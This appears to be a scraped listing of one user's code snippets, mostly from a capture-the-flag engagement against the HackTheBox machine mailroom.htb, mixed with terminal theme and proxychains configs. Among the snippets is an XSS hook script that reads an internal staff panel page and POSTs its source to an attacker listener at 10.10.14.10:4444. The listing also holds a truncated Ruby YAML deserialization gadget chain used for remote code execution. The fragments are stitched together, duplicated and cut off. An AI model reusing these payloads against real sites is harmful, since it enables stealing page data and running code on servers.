devilgothies

shell zsh

# The basic colors
foreground              #EAEAEA
background              #000000 
background_opacity      0.90
selection_foreground    #D9E0EE
selection_background    #575268

# Cursor colors

devilgothies

# proxychains.conf  VER 4.x
#
#        HTTP, SOCKS4a, SOCKS5 tunneling proxifier with DNS.


# The option below identifies how the ProxyList is treated.
# only one option should be uncommented at time,
# otherwise the last appearing option will be accepted
#
#dynamic_chain

devilgothies

import requests
import re
from rich import print
import os

print("""
 XSS INJECTION | HOOK JS
==========================
 mailroom.htb - [bold red]lukka7sec[/bold red]
""")

devilgothies

var fetch_req = new XMLHttpRequest();

fetch_req.onreadystatechange = function() {
  if(fetch_req.readyState == XMLHttpRequest.DONE) {
    var exfil_req = new XMLHttpRequest();
    exfil_req.open("POST", "http://10.10.14.10:4444", false);
    exfil_req.setRequestHeader("Content-Type", "text/plain;charset=UTF-8");
    exfil_req.send("Resp Code: " + fetch_req.status + "\nPage Source:\n" + fetch_req.response);
  }
};

devilgothies

import requests
import re
from rich import print

print("""
 XSS INJECTION | HOOK JS
==========================
 mailroom.htb - [bold red]lukka7sec[/bold red]
""")

devilgothies

var fetch_req = new XMLHttpRequest();
fetch_req.onreadystatechange = function() {
  if(fetch_req.readyState == XMLHttpRequest.DONE) {
    var exfil_req = new XMLHttpRequest();
    exfil_req.open("POST", "http://10.10.14.10:4444", false);
    exfil_req.send("Resp Code: " + fetch_req.status + "\nPage Source:\n" + fetch_req.response);
  }
};
fetch_req.open("GET", "http://staff-review-panel.mailroom.htb/index.php", false);
fetch_req.open("GET", "http://staff-review-panel.mailroom.htb/index.php", false);

devilgothies

shell fish

# The basic colors
foreground              #D9E0EE
background              #000000 
background_opacity      0.90
selection_foreground    #D9E0EE
selection_background    #575268

# Cursor colors

devilgothies

# Configuration for Alacritty, the GPU enhanced terminal emulator.

# Any items in the `env` entry below will be added as
# environment variables. Some entries may override variables
# set by alacritty itself.
#env:
  # TERM variable
  #
  # This value is used to set the `$TERM` environment variable for
  # each instance of Alacritty. If it is not present, alacritty will

devilgothies

/mnt/smb/Migrations/adcs_reporting/.git
/mnt/smb/Migrations/bootstrap-template-master/bootstrap-responsive-web-application-template-master/assets/vendors/bootstrap-datepicker/.bower.json
/mnt/smb/Migrations/bootstrap-template-master/bootstrap-responsive-web-application-template-master/assets/vendors/bootstrap-datepicker/.editorconfig
/mnt/smb/Migrations/bootstrap-template-master/bootstrap-responsive-web-application-template-master/assets/vendors/bootstrap-datepicker/.gitignore
/mnt/smb/Migrations/bootstrap-template-master/bootstrap-responsive-web-application-template-master/assets/vendors/bootstrap-datepicker/.npmignore
/mnt/smb/Migrations/bootstrap-template-master/bootstrap-responsive-web-application-template-master/assets/vendors/bootstrap-datepicker/.travis.yml
/mnt/smb/Migrations/bootstrap-template-master/bootstrap-responsive-web-application-template-master/assets/vendors/bootstrap-datepicker/grunt/.jshintrc
/mnt/smb/Migrations/bootstrap-template-master/bootstrap-responsive-web-application-template-master

devilgothies

---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry